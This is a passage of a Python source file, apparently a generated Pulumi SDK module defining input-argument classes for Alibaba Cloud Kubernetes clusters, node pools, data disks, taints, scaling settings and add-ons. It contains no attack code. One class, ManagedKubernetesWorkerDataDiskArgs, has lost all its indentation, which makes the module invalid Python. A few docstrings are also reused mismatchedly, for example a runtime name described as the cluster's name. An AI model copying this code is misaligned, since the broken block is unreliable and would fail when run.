    def api_server_intranet(self) -> Optional[pulumi.Input[str]]:
        """
        API Server Intranet endpoint.
        """
        return pulumi.get(self, "api_server_intranet")

    @api_server_intranet.setter
    def api_server_intranet(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "api_server_intranet", value)

    @property
    @pulumi.getter(name="masterPublicIp")
    def master_public_ip(self) -> Optional[pulumi.Input[str]]:
        """
        Master node SSH IP address.
        """
        return pulumi.get(self, "master_public_ip")

    @master_public_ip.setter
    def master_public_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "master_public_ip", value)

    @property
    @pulumi.getter(name="serviceDomain")
    def service_domain(self) -> Optional[pulumi.Input[str]]:
        """
        Service Access Domain.
        """
        return pulumi.get(self, "service_domain")

    @service_domain.setter
    def service_domain(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "service_domain", value)
@pulumi.input_type
class ManagedKubernetesMaintenanceWindowArgs:
    def __init__(__self__, *,
                 duration: pulumi.Input[str],
                 enable: pulumi.Input[bool],
                 maintenance_time: pulumi.Input[str],
                 weekly_period: pulumi.Input[str]):
        """
        Maintenance window settings for the managed cluster.

        :param pulumi.Input[str] duration: The maintenance time, values range from 1 to 24,unit is hour. For example: "3h".
        :param pulumi.Input[bool] enable: Whether to open the maintenance window. The following parameters take effect only `enable = true`.
        :param pulumi.Input[str] maintenance_time: Initial maintenance time, For example:"03:00:00Z".
        :param pulumi.Input[str] weekly_period: Maintenance cycle, you can set the values from Monday to Sunday, separated by commas when the values are multiple. The default is Thursday.
        """
        # All four fields are mandatory, so each is stored unconditionally.
        for field, supplied in (("duration", duration),
                                ("enable", enable),
                                ("maintenance_time", maintenance_time),
                                ("weekly_period", weekly_period)):
            pulumi.set(__self__, field, supplied)

    @property
    @pulumi.getter
    def duration(self) -> pulumi.Input[str]:
        """
        The maintenance time, values range from 1 to 24,unit is hour. For example: "3h".
        """
        return pulumi.get(self, "duration")

    @duration.setter
    def duration(self, value: pulumi.Input[str]):
        pulumi.set(self, "duration", value)

    @property
    @pulumi.getter
    def enable(self) -> pulumi.Input[bool]:
        """
        Whether to open the maintenance window. The following parameters take effect only `enable = true`.
        """
        return pulumi.get(self, "enable")

    @enable.setter
    def enable(self, value: pulumi.Input[bool]):
        pulumi.set(self, "enable", value)

    @property
    @pulumi.getter(name="maintenanceTime")
    def maintenance_time(self) -> pulumi.Input[str]:
        """
        Initial maintenance time, For example:"03:00:00Z".
        """
        return pulumi.get(self, "maintenance_time")

    @maintenance_time.setter
    def maintenance_time(self, value: pulumi.Input[str]):
        pulumi.set(self, "maintenance_time", value)

    @property
    @pulumi.getter(name="weeklyPeriod")
    def weekly_period(self) -> pulumi.Input[str]:
        """
        Maintenance cycle, you can set the values from Monday to Sunday, separated by commas when the values are multiple. The default is Thursday.
        """
        return pulumi.get(self, "weekly_period")

    @weekly_period.setter
    def weekly_period(self, value: pulumi.Input[str]):
        pulumi.set(self, "weekly_period", value)
@pulumi.input_type
class ManagedKubernetesRuntimeArgs:
    def __init__(__self__, *,
                 name: Optional[pulumi.Input[str]] = None,
                 version: Optional[pulumi.Input[str]] = None):
        """
        Container runtime selection for the managed cluster.

        :param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
        :param pulumi.Input[str] version: Desired Kubernetes version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except you set a higher version number. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by ACK.
        """
        # Store only the fields the caller actually supplied.
        for field, supplied in (("name", name), ("version", version)):
            if supplied is not None:
                pulumi.set(__self__, field, supplied)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The kubernetes cluster's name. It is unique in one Alicloud account.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def version(self) -> Optional[pulumi.Input[str]]:
        """
        Desired Kubernetes version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except you set a higher version number. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by ACK.
        """
        return pulumi.get(self, "version")

    @version.setter
    def version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "version", value)
@pulumi.input_type
class ManagedKubernetesTaintArgs:
    def __init__(__self__, *,
                 effect: Optional[pulumi.Input[str]] = None,
                 key: Optional[pulumi.Input[str]] = None,
                 value: Optional[pulumi.Input[str]] = None):
        """
        A node taint expressed as its effect/key/value triple.
        """
        # Store only the fields the caller actually supplied.
        for field, supplied in (("effect", effect),
                                ("key", key),
                                ("value", value)):
            if supplied is not None:
                pulumi.set(__self__, field, supplied)

    @property
    @pulumi.getter
    def effect(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "effect")

    @effect.setter
    def effect(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "effect", value)

    @property
    @pulumi.getter
    def key(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter
    def value(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class ManagedKubernetesWorkerDataDiskArgs:
def __init__(__self__, *,
auto_snapshot_policy_id: Optional[pulumi.Input[str]] = None,
category: Optional[pulumi.Input[str]] = None,
device: Optional[pulumi.Input[str]] = None,
encrypted: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
performance_level: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[str]] = None,
snapshot_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] auto_snapshot_policy_id: Worker node data disk auto snapshot policy.
:param pulumi.Input[str] category: The type of the data disks. Valid values: `cloud`, `cloud_efficiency`, `cloud_ssd` and `cloud_essd`. Default to `cloud_efficiency`.
:param pulumi.Input[str] encrypted: Specifies whether to encrypt data disks. Valid values: true and false. Default to `false`.
:param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
:param pulumi.Input[str] performance_level: Worker node data disk performance level, when `category` values `cloud_essd`, the optional values are `PL0`, `PL1`, `PL2` or `PL3`, but the specific performance level is related to the disk capacity. For more information, see [Enhanced SSDs](https://www.alibabacloud.com/help/doc-detail/122389.htm). Default is `PL1`.
:param pulumi.Input[str] size: The size of a data disk, at least 40. Unit: GiB.
"""
if auto_snapshot_policy_id is not None:
pulumi.set(__self__, "auto_snapshot_policy_id", auto_snapshot_policy_id)
if category is not None:
pulumi.set(__self__, "category", category)
if device is not None:
pulumi.set(__self__, "device", device)
if encrypted is not None:
pulumi.set(__self__, "encrypted", encrypted)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if name is not None:
pulumi.set(__self__, "name", name)
if performance_level is not None:
pulumi.set(__self__, "performance_level", performance_level)
if size is not None:
pulumi.set(__self__, "size", size)
if snapshot_id is not None:
pulumi.set(__self__, "snapshot_id", snapshot_id)
# Generated accessor pairs for the worker data-disk arguments: each @property
# getter reads and each setter writes the pulumi-managed attribute of the same
# name via pulumi.get / pulumi.set.
@property
@pulumi.getter(name="autoSnapshotPolicyId")
def auto_snapshot_policy_id(self) -> Optional[pulumi.Input[str]]:
"""
Worker node data disk auto snapshot policy.
"""
return pulumi.get(self, "auto_snapshot_policy_id")
@auto_snapshot_policy_id.setter
def auto_snapshot_policy_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "auto_snapshot_policy_id", value)
@property
@pulumi.getter
def category(self) -> Optional[pulumi.Input[str]]:
"""
The type of the data disks. Valid values: `cloud`, `cloud_efficiency`, `cloud_ssd` and `cloud_essd`. Default to `cloud_efficiency`.
"""
return pulumi.get(self, "category")
@category.setter
def category(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "category", value)
@property
@pulumi.getter
def device(self) -> Optional[pulumi.Input[str]]:
# NOTE(review): undocumented upstream; presumably the device name the disk is attached at — verify.
return pulumi.get(self, "device")
@device.setter
def device(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "device", value)
@property
@pulumi.getter
def encrypted(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether to encrypt data disks. Valid values: true and false. Default to `false`.
"""
return pulumi.get(self, "encrypted")
@encrypted.setter
def encrypted(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "encrypted", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
# NOTE(review): undocumented upstream; presumably the KMS key used for disk encryption — verify.
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The kubernetes cluster's name. It is unique in one Alicloud account.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="performanceLevel")
def performance_level(self) -> Optional[pulumi.Input[str]]:
"""
Worker node data disk performance level, when `category` values `cloud_essd`, the optional values are `PL0`, `PL1`, `PL2` or `PL3`, but the specific performance level is related to the disk capacity. For more information, see [Enhanced SSDs](https://www.alibabacloud.com/help/doc-detail/122389.htm). Default is `PL1`.
"""
return pulumi.get(self, "performance_level")
@performance_level.setter
def performance_level(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "performance_level", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[str]]:
"""
The size of a data disk, at least 40. Unit: GiB.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter(name="snapshotId")
def snapshot_id(self) -> Optional[pulumi.Input[str]]:
# NOTE(review): undocumented upstream; presumably a snapshot to initialise the disk from — verify.
return pulumi.get(self, "snapshot_id")
@snapshot_id.setter
def snapshot_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "snapshot_id", value)
@pulumi.input_type
class ManagedKubernetesWorkerNodeArgs:
    """Describes a single worker node of a managed Kubernetes cluster."""

    def __init__(__self__, *,
                 id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 private_ip: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] id: ID of the node.
        :param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
        :param pulumi.Input[str] private_ip: The private IP address of node.
        """
        # Register only the arguments that were explicitly supplied.
        for attr_name, attr_value in (("id", id),
                                      ("name", name),
                                      ("private_ip", private_ip)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        """ID of the node."""
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """The kubernetes cluster's name. It is unique in one Alicloud account."""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="privateIp")
    def private_ip(self) -> Optional[pulumi.Input[str]]:
        """The private IP address of node."""
        return pulumi.get(self, "private_ip")

    @private_ip.setter
    def private_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "private_ip", value)
@pulumi.input_type
class NodePoolDataDiskArgs:
    """Configuration of one data disk attached to node-pool instances."""

    def __init__(__self__, *,
                 auto_snapshot_policy_id: Optional[pulumi.Input[str]] = None,
                 category: Optional[pulumi.Input[str]] = None,
                 device: Optional[pulumi.Input[str]] = None,
                 encrypted: Optional[pulumi.Input[str]] = None,
                 kms_key_id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 performance_level: Optional[pulumi.Input[str]] = None,
                 size: Optional[pulumi.Input[int]] = None,
                 snapshot_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] category: The type of the data disks. Valid values:`cloud`, `cloud_efficiency`, `cloud_ssd` and `cloud_essd`.
        :param pulumi.Input[str] encrypted: Specifies whether to encrypt data disks. Valid values: true and false. Default to `false`.
        :param pulumi.Input[str] name: The name of node pool.
        :param pulumi.Input[str] performance_level: Worker node data disk performance level, when `category` values `cloud_essd`, the optional values are `PL0`, `PL1`, `PL2` or `PL3`, but the specific performance level is related to the disk capacity. For more information, see [Enhanced SSDs](https://www.alibabacloud.com/help/doc-detail/122389.htm). Default is `PL1`.
        :param pulumi.Input[int] size: The size of a data disk, Its valid value range [40~32768] in GB. Default to `40`.
        """
        # Forward every argument that was explicitly provided.
        supplied = (
            ("auto_snapshot_policy_id", auto_snapshot_policy_id),
            ("category", category),
            ("device", device),
            ("encrypted", encrypted),
            ("kms_key_id", kms_key_id),
            ("name", name),
            ("performance_level", performance_level),
            ("size", size),
            ("snapshot_id", snapshot_id),
        )
        for attr_name, attr_value in supplied:
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="autoSnapshotPolicyId")
    def auto_snapshot_policy_id(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "auto_snapshot_policy_id")

    @auto_snapshot_policy_id.setter
    def auto_snapshot_policy_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "auto_snapshot_policy_id", value)

    @property
    @pulumi.getter
    def category(self) -> Optional[pulumi.Input[str]]:
        """The type of the data disks. Valid values:`cloud`, `cloud_efficiency`, `cloud_ssd` and `cloud_essd`."""
        return pulumi.get(self, "category")

    @category.setter
    def category(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "category", value)

    @property
    @pulumi.getter
    def device(self) -> Optional[pulumi.Input[str]]:
        # NOTE(review): undocumented upstream; presumably the attach device name — verify.
        return pulumi.get(self, "device")

    @device.setter
    def device(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "device", value)

    @property
    @pulumi.getter
    def encrypted(self) -> Optional[pulumi.Input[str]]:
        """Specifies whether to encrypt data disks. Valid values: true and false. Default to `false`."""
        return pulumi.get(self, "encrypted")

    @encrypted.setter
    def encrypted(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "encrypted", value)

    @property
    @pulumi.getter(name="kmsKeyId")
    def kms_key_id(self) -> Optional[pulumi.Input[str]]:
        # NOTE(review): undocumented upstream; presumably the KMS key for disk encryption — verify.
        return pulumi.get(self, "kms_key_id")

    @kms_key_id.setter
    def kms_key_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "kms_key_id", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """The name of node pool."""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="performanceLevel")
    def performance_level(self) -> Optional[pulumi.Input[str]]:
        """Worker node data disk performance level, when `category` values `cloud_essd`, the optional values are `PL0`, `PL1`, `PL2` or `PL3`, but the specific performance level is related to the disk capacity. For more information, see [Enhanced SSDs](https://www.alibabacloud.com/help/doc-detail/122389.htm). Default is `PL1`."""
        return pulumi.get(self, "performance_level")

    @performance_level.setter
    def performance_level(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "performance_level", value)

    @property
    @pulumi.getter
    def size(self) -> Optional[pulumi.Input[int]]:
        """The size of a data disk, Its valid value range [40~32768] in GB. Default to `40`."""
        return pulumi.get(self, "size")

    @size.setter
    def size(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "size", value)

    @property
    @pulumi.getter(name="snapshotId")
    def snapshot_id(self) -> Optional[pulumi.Input[str]]:
        # NOTE(review): undocumented upstream; presumably a snapshot to initialise the disk from — verify.
        return pulumi.get(self, "snapshot_id")

    @snapshot_id.setter
    def snapshot_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "snapshot_id", value)
@pulumi.input_type
class NodePoolLabelArgs:
    """A single Kubernetes label (key, optional value) applied to node-pool nodes."""

    def __init__(__self__, *,
                 key: pulumi.Input[str],
                 value: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] key: The label key.
        :param pulumi.Input[str] value: The label value.
        """
        # `key` is required; `value` is only set when given.
        pulumi.set(__self__, "key", key)
        if value is not None:
            pulumi.set(__self__, "value", value)

    @property
    @pulumi.getter
    def key(self) -> pulumi.Input[str]:
        """The label key."""
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: pulumi.Input[str]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter
    def value(self) -> Optional[pulumi.Input[str]]:
        """The label value."""
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class NodePoolManagementArgs:
    """Managed-node-pool maintenance settings (repair, upgrade and surge control)."""

    def __init__(__self__, *,
                 max_unavailable: pulumi.Input[int],
                 auto_repair: Optional[pulumi.Input[bool]] = None,
                 auto_upgrade: Optional[pulumi.Input[bool]] = None,
                 surge: Optional[pulumi.Input[int]] = None,
                 surge_percentage: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[int] max_unavailable: Max number of unavailable nodes. Default to `1`.
        :param pulumi.Input[bool] auto_repair: Whether automatic repair, Default to `false`.
        :param pulumi.Input[bool] auto_upgrade: Whether auto upgrade, Default to `false`.
        :param pulumi.Input[int] surge: Number of additional nodes. You have to specify one of surge, surge_percentage.
        :param pulumi.Input[int] surge_percentage: Proportion of additional nodes. You have to specify one of surge, surge_percentage.
        """
        # The only mandatory field.
        pulumi.set(__self__, "max_unavailable", max_unavailable)
        # Optional fields are set only when supplied.
        for attr_name, attr_value in (("auto_repair", auto_repair),
                                      ("auto_upgrade", auto_upgrade),
                                      ("surge", surge),
                                      ("surge_percentage", surge_percentage)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="maxUnavailable")
    def max_unavailable(self) -> pulumi.Input[int]:
        """Max number of unavailable nodes. Default to `1`."""
        return pulumi.get(self, "max_unavailable")

    @max_unavailable.setter
    def max_unavailable(self, value: pulumi.Input[int]):
        pulumi.set(self, "max_unavailable", value)

    @property
    @pulumi.getter(name="autoRepair")
    def auto_repair(self) -> Optional[pulumi.Input[bool]]:
        """Whether automatic repair, Default to `false`."""
        return pulumi.get(self, "auto_repair")

    @auto_repair.setter
    def auto_repair(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "auto_repair", value)

    @property
    @pulumi.getter(name="autoUpgrade")
    def auto_upgrade(self) -> Optional[pulumi.Input[bool]]:
        """Whether auto upgrade, Default to `false`."""
        return pulumi.get(self, "auto_upgrade")

    @auto_upgrade.setter
    def auto_upgrade(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "auto_upgrade", value)

    @property
    @pulumi.getter
    def surge(self) -> Optional[pulumi.Input[int]]:
        """Number of additional nodes. You have to specify one of surge, surge_percentage."""
        return pulumi.get(self, "surge")

    @surge.setter
    def surge(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "surge", value)

    @property
    @pulumi.getter(name="surgePercentage")
    def surge_percentage(self) -> Optional[pulumi.Input[int]]:
        """Proportion of additional nodes. You have to specify one of surge, surge_percentage."""
        return pulumi.get(self, "surge_percentage")

    @surge_percentage.setter
    def surge_percentage(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "surge_percentage", value)
@pulumi.input_type
class NodePoolScalingConfigArgs:
    """Auto-scaling configuration of a node pool (group size bounds and EIP options)."""

    def __init__(__self__, *,
                 max_size: pulumi.Input[int],
                 min_size: pulumi.Input[int],
                 eip_bandwidth: Optional[pulumi.Input[int]] = None,
                 eip_internet_charge_type: Optional[pulumi.Input[str]] = None,
                 is_bond_eip: Optional[pulumi.Input[bool]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[int] max_size: Max number of instances in a auto scaling group, its valid value range [0~1000]. `max_size` has to be greater than `min_size`.
        :param pulumi.Input[int] min_size: Min number of instances in a auto scaling group, its valid value range [0~1000].
        :param pulumi.Input[int] eip_bandwidth: Peak EIP bandwidth. Its valid value range [1~500] in Mbps. Default to `5`.
        :param pulumi.Input[str] eip_internet_charge_type: EIP billing type. `PayByBandwidth`: Charged at fixed bandwidth. `PayByTraffic`: Billed as used traffic. Default: `PayByBandwidth`. Conflict with `internet_charge_type`, EIP and public network IP can only choose one.
        :param pulumi.Input[bool] is_bond_eip: Whether to bind EIP for an instance. Default: `false`.
        :param pulumi.Input[str] type: Instance classification, not required. Vaild value: `cpu`, `gpu`, `gpushare` and `spot`. Default: `cpu`. The actual instance type is determined by `instance_types`.
        """
        # Required size bounds.
        pulumi.set(__self__, "max_size", max_size)
        pulumi.set(__self__, "min_size", min_size)
        # Optional EIP / classification settings.
        for attr_name, attr_value in (("eip_bandwidth", eip_bandwidth),
                                      ("eip_internet_charge_type", eip_internet_charge_type),
                                      ("is_bond_eip", is_bond_eip),
                                      ("type", type)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="maxSize")
    def max_size(self) -> pulumi.Input[int]:
        """Max number of instances in a auto scaling group, its valid value range [0~1000]. `max_size` has to be greater than `min_size`."""
        return pulumi.get(self, "max_size")

    @max_size.setter
    def max_size(self, value: pulumi.Input[int]):
        pulumi.set(self, "max_size", value)

    @property
    @pulumi.getter(name="minSize")
    def min_size(self) -> pulumi.Input[int]:
        """Min number of instances in a auto scaling group, its valid value range [0~1000]."""
        return pulumi.get(self, "min_size")

    @min_size.setter
    def min_size(self, value: pulumi.Input[int]):
        pulumi.set(self, "min_size", value)

    @property
    @pulumi.getter(name="eipBandwidth")
    def eip_bandwidth(self) -> Optional[pulumi.Input[int]]:
        """Peak EIP bandwidth. Its valid value range [1~500] in Mbps. Default to `5`."""
        return pulumi.get(self, "eip_bandwidth")

    @eip_bandwidth.setter
    def eip_bandwidth(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "eip_bandwidth", value)

    @property
    @pulumi.getter(name="eipInternetChargeType")
    def eip_internet_charge_type(self) -> Optional[pulumi.Input[str]]:
        """EIP billing type. `PayByBandwidth`: Charged at fixed bandwidth. `PayByTraffic`: Billed as used traffic. Default: `PayByBandwidth`. Conflict with `internet_charge_type`, EIP and public network IP can only choose one."""
        return pulumi.get(self, "eip_internet_charge_type")

    @eip_internet_charge_type.setter
    def eip_internet_charge_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "eip_internet_charge_type", value)

    @property
    @pulumi.getter(name="isBondEip")
    def is_bond_eip(self) -> Optional[pulumi.Input[bool]]:
        """Whether to bind EIP for an instance. Default: `false`."""
        return pulumi.get(self, "is_bond_eip")

    @is_bond_eip.setter
    def is_bond_eip(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_bond_eip", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """Instance classification, not required. Vaild value: `cpu`, `gpu`, `gpushare` and `spot`. Default: `cpu`. The actual instance type is determined by `instance_types`."""
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class NodePoolSpotPriceLimitArgs:
    """Price cap for one spot instance type in a node pool."""

    def __init__(__self__, *,
                 instance_type: Optional[pulumi.Input[str]] = None,
                 price_limit: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] instance_type: Spot instance type.
        :param pulumi.Input[str] price_limit: The maximum hourly price of the spot instance.
        """
        # Both fields are optional; only set what was given.
        for attr_name, attr_value in (("instance_type", instance_type),
                                      ("price_limit", price_limit)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="instanceType")
    def instance_type(self) -> Optional[pulumi.Input[str]]:
        """Spot instance type."""
        return pulumi.get(self, "instance_type")

    @instance_type.setter
    def instance_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "instance_type", value)

    @property
    @pulumi.getter(name="priceLimit")
    def price_limit(self) -> Optional[pulumi.Input[str]]:
        """The maximum hourly price of the spot instance."""
        return pulumi.get(self, "price_limit")

    @price_limit.setter
    def price_limit(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "price_limit", value)
@pulumi.input_type
class NodePoolTaintArgs:
    """A Kubernetes taint (key, optional value, optional effect) applied to node-pool nodes."""

    def __init__(__self__, *,
                 key: pulumi.Input[str],
                 effect: Optional[pulumi.Input[str]] = None,
                 value: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] key: The taint key.
        :param pulumi.Input[str] effect: The taint effect. NOTE(review): presumably one of
               `NoSchedule`, `NoExecute` or `PreferNoSchedule` (the Kubernetes taint effects);
               not documented upstream — verify against the provider docs.
        :param pulumi.Input[str] value: The taint value.
        """
        # `key` is required; `effect` and `value` are set only when supplied.
        pulumi.set(__self__, "key", key)
        if effect is not None:
            pulumi.set(__self__, "effect", effect)
        if value is not None:
            pulumi.set(__self__, "value", value)

    @property
    @pulumi.getter
    def key(self) -> pulumi.Input[str]:
        """The taint key."""
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: pulumi.Input[str]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter
    def effect(self) -> Optional[pulumi.Input[str]]:
        """The taint effect."""
        return pulumi.get(self, "effect")

    @effect.setter
    def effect(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "effect", value)

    @property
    @pulumi.getter
    def value(self) -> Optional[pulumi.Input[str]]:
        """The taint value."""
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class ServerlessKubernetesAddonArgs:
    """Configuration of a single ACK add-on for a serverless Kubernetes cluster."""

    def __init__(__self__, *,
                 config: Optional[pulumi.Input[str]] = None,
                 disabled: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] config: The ACK add-on configurations.
        :param pulumi.Input[bool] disabled: Disables the automatic installation of a component. Default is `false`.
        :param pulumi.Input[str] name: Name of the ACK add-on. The name must match one of the names returned by [DescribeAddons](https://help.aliyun.com/document_detail/171524.html).
        """
        # All fields are optional; only provided values are registered.
        for attr_name, attr_value in (("config", config),
                                      ("disabled", disabled),
                                      ("name", name)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter
    def config(self) -> Optional[pulumi.Input[str]]:
        """The ACK add-on configurations."""
        return pulumi.get(self, "config")

    @config.setter
    def config(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "config", value)

    @property
    @pulumi.getter
    def disabled(self) -> Optional[pulumi.Input[bool]]:
        """Disables the automatic installation of a component. Default is `false`."""
        return pulumi.get(self, "disabled")

    @disabled.setter
    def disabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "disabled", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """Name of the ACK add-on. The name must match one of the names returned by [DescribeAddons](https://help.aliyun.com/document_detail/171524.html)."""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class SwarmNodeArgs:
    """Describes a single node of a Swarm cluster.

    NOTE(review): none of these fields are documented upstream; the names suggest
    the node's EIP, ID, name, private IP and status — verify against provider docs.
    """

    def __init__(__self__, *,
                 eip: Optional[pulumi.Input[str]] = None,
                 id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 private_ip: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None):
        # Every field is optional; register only what was supplied.
        for attr_name, attr_value in (("eip", eip),
                                      ("id", id),
                                      ("name", name),
                                      ("private_ip", private_ip),
                                      ("status", status)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter
    def eip(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "eip")

    @eip.setter
    def eip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "eip", value)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="privateIp")
    def private_ip(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "private_ip")

    @private_ip.setter
    def private_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "private_ip", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)
@pulumi.input_type
class GetKubernetesPermissionPermissionArgs:
    """A single permission entry used when querying ACK cluster permissions."""

    def __init__(__self__, *,
                 resource_id: str,
                 resource_type: str,
                 role_name: str,
                 is_owner: Optional[bool] = None,
                 is_ram_role: Optional[bool] = None,
                 role_type: Optional[str] = None):
        """
